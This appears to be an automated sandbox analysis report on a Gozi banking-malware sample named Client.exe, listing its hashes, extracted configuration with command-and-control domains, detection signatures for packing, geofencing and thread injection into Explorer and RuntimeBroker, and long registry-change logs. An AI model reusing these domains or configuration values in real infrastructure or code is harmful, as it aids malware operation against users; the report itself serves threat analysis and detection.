Analysis
-
max time kernel
171s -
max time network
158s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
11-10-2023 09:56
Static task
static1
Behavioral task
behavioral1
Sample
Client.exe
Resource
win7-20230831-en
General
-
Target
Client.exe
-
Size
181KB
-
MD5
e54d9f8d9757fe6eead98ab59bd59ffa
-
SHA1
60c8766682b968d9367f9099378f2c9f0ed07278
-
SHA256
64eee9187e295afcb6989200de6fef6ca563d48881784c38765e5cc590e55ad6
-
SHA512
b362675e7c21b0336ed5844ed453334bd93257ea6901fed5b532d06db54ad775c33c17c753414f34c8c9117ce38cc072a4b59deeb7add1ea76b63183948f511e
-
SSDEEP
3072:+gZW8+P3NtOTH8CG95Ja4tXybaVLbPkxAgaX6wwzCqIg9:+SWfPLOL85hlVfjRSIg9
Malware Config
Extracted
gozi
Extracted
gozi
5050
netsecurez.com
whofoxy.com
mimemoa.com
ntcgo.com
-
base_path
/jerry/
-
build
250260
-
exe_type
loader
-
extension
.bob
-
server_id
50
Extracted
gozi
5050
fotexion.com
-
base_path
/pictures/
-
build
250260
-
exe_type
worker
-
extension
.bob
-
server_id
50
Signatures
-
Dave packer 1 IoCs
Detects executable using a packer named 'Dave' by the community, based on a string at the end.
Processes:
resource yara_rule behavioral2/memory/5020-0-0x00000000008B0000-0x00000000008BC000-memory.dmp dave -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation mshta.exe -
Suspicious use of SetThreadContext 8 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exedescription pid process target process PID 1660 set thread context of 3136 1660 powershell.exe Explorer.EXE PID 3136 set thread context of 1232 3136 Explorer.EXE cmd.exe PID 3136 set thread context of 3716 3136 Explorer.EXE RuntimeBroker.exe PID 3136 set thread context of 3988 3136 Explorer.EXE RuntimeBroker.exe PID 3136 set thread context of 4840 3136 Explorer.EXE RuntimeBroker.exe PID 3136 set thread context of 1328 3136 Explorer.EXE RuntimeBroker.exe PID 1232 set thread context of 2492 1232 cmd.exe PING.EXE PID 3136 set thread context of 4364 3136 Explorer.EXE cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 64 IoCs
Processes:
RuntimeBroker.exeExplorer.EXEdescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5d1dea61-5cea-4f6d-8 = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a07da212-3d59-42d0-a RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fdcdeac2-3361-446d-9 = 0138be605afcd901 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\069284ac-4b25-4fca-8 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\069284ac-4b25-4fca-8 = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1a10d16a-c052-491c-8 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000e75e05615afcd9015a891a645afcd9015a891a645afcd901b95107000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004b570f7e2000346362303837396664653037343433633237333563626335313161333661396664303034653530633837613066613164343338356531386233313435633164310000b20009000400efbe4b570f7e4b570f7e2e000000000000000000000000000000000000000000000000004d6bf400340063006200300038003700390066006400650030003700340034003300630032003700330035006300620063003500310031006100330036006100390066006400300030003400650035003000630038003700610030006600610031006400340033003800350065003100380062003300310034003500630031006400310000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000c5b088b81000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c34636230383739666465303734343363323733356362633531316133366139666430303465353063383761306661316434333835653138623331343563316431000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000736d696a776a6d68000000000000000052d8063eedfcdf448a23f9f8aed1bb8a6a42cec39b53ee11941eda422a6bcb3952d8063eedfcdf448a23f9f8aed1bb8a6a42cec39b53ee11941eda422a6bcb39ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d003900310039003200350034003400390032002d0033003900370039003200390033003900390037002d003700360034003400300037003100390032002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000530b1468000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1c70a371-e627-462c-9 = "\\\\?\\Volume{68140B53-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\798bab418ff816a6ace8850bac671d772ef9eb0b280d7a794ee2670143dfeff4" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\092853f3-5ad2-4234-a RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa2e16cc-f0b5-4d98-8 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ec73ecb3-6d21-4fb3-b = 46d609665afcd901 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1ce6b35f-a329-4d61-8 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\296c7fe0-7c30-4399-9 = "\\\\?\\Volume{68140B53-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\7bc0088eba699b92efa47081b58ef5b52a864bfaa41addce48899aae05b2dfe4" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1d8c7192-1824-439e-b = "\\\\?\\Volume{68140B53-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\59c3fa9302be408752ef4ead385a697de3f6898d9576f722e3aa74e43178d1fb" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1d8c7192-1824-439e-b = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000001d55796d5afcd901e33115725afcd901e33115725afcd901278005000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004b57137e2000353963336661393330326265343038373532656634656164333835613639376465336636383938643935373666373232653361613734653433313738643166620000b20009000400efbe4b57137e4b57137e2e00000000000000000000000000000000000000000000000000fb967f00350039006300330066006100390033003000320062006500340030003800370035003200650066003400650061006400330038003500610036003900370064006500330066003600380039003800640039003500370036006600370032003200650033006100610037003400650034003300310037003800640031006600620000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000c5b088b81000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c35396333666139333032626534303837353265663465616433383561363937646533663638393864393537366637323265336161373465343331373864316662000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000736d696a776a6d68000000000000000052d8063eedfcdf448a23f9f8aed1bb8a7342cec39b53ee11941eda422a6bcb3952d8063eedfcdf448a23f9f8aed1bb8a7342cec39b53ee11941eda422a6bcb39ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d003900310039003200350034003400390032002d0033003900370039003200390033003900390037002d003700360034003400300037003100390032002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000530b1468000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\05a8205a-3321-4131-b RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\821100a3-c46d-48ec-b = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3c373edc-a9e5-416f-a RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1a10d16a-c052-491c-8 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a07da212-3d59-42d0-a = "0" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3c373edc-a9e5-416f-a = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\092853f3-5ad2-4234-a = "\\\\?\\Volume{68140B53-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\073d2487c7d2f28548abe92373ad335ad4a29a209841581499e4c9daf24869ec" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a5ebedc8-c9df-4308-8 = "\\\\?\\Volume{68140B53-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\1d8d3aca0295850f5e14c3f4f0a7ea32fdf938d55a27933cec93d1447665cf2c" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a5ebedc8-c9df-4308-8 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000db72e06c5afcd90132e49b6e5afcd90132e49b6e5afcd90188b105000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004b57137e2000316438643361636130323935383530663565313463336634663061376561333266646639333864353561323739333363656339336431343437363635636632630000b20009000400efbe4b57137e4b57137e2e0000000000000000000000000000000000000000000000000028838b00310064003800640033006100630061003000320039003500380035003000660035006500310034006300330066003400660030006100370065006100330032006600640066003900330038006400350035006100320037003900330033006300650063003900330064003100340034003700360036003500630066003200630000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000c5b088b81000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c31643864336163613032393538353066356531346333663466306137656133326664663933386435356132373933336365633933643134343736363563663263000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000736d696a776a6d68000000000000000052d8063eedfcdf448a23f9f8aed1bb8a7142cec39b53ee11941eda422a6bcb3952d8063eedfcdf448a23f9f8aed1bb8a7142cec39b53ee11941eda422a6bcb39ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d003900310039003200350034003400390032002d0033003900370039003200390033003900390037002d003700360034003400300037003100390032002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000530b1468000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a09bf69d-486e-4b93-8 = "\\\\?\\Volume{68140B53-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\f092e49a1f78f5426236a46a340a55caa6a0ad76a6596ffcc2fcb9a838572e04" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa2e16cc-f0b5-4d98-8 = "0" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7421f031-8923-45ea-9 = "0" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\36198399-385a-4ddd-a RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\05a8205a-3321-4131-b RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\296c7fe0-7c30-4399-9 = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8398a3e1-0272-4395-9 = 09decc605afcd901 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\32f3168e-9794-4c8a-a = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\05a8205a-3321-4131-b = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fb4060f5-deed-4734-9 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\069284ac-4b25-4fca-8 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000e36d18615afcd9015a891a645afcd9015a891a645afcd901473e07000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000004b570f7e2000646363373663383161663061643966666332633735383663323161353136613239383536393033323838343132393063393636383466306133643961653136300000b20009000400efbe4b570f7e4b570f7e2e000000000000000000000000000000000000000000000000007b071101640063006300370036006300380031006100660030006100640039006600660063003200630037003500380036006300320031006100350031003600610032003900380035003600390030003300320038003800340031003200390030006300390036003600380034006600300061003300640039006100650031003600300000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000c5b088b81000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c64636337366338316166306164396666633263373538366332316135313661323938353639303332383834313239306339363638346630613364396165313630000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000736d696a776a6d68000000000000000052d8063eedfcdf448a23f9f8aed1bb8a6842cec39b53ee11941eda422a6bcb3952d8063eedfcdf448a23f9f8aed1bb8a6842cec39b53ee11941eda422a6bcb39ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d003900310039003200350034003400390032002d0033003900370039003200390033003900390037002d003700360034003400300037003100390032002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000530b1468000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1d8c7192-1824-439e-b RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5d1dea61-5cea-4f6d-8 = "\\\\?\\Volume{68140B53-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\798bab418ff816a6ace8850bac671d772ef9eb0b280d7a794ee2670143dfeff4" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ec73ecb3-6d21-4fb3-b = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (int) 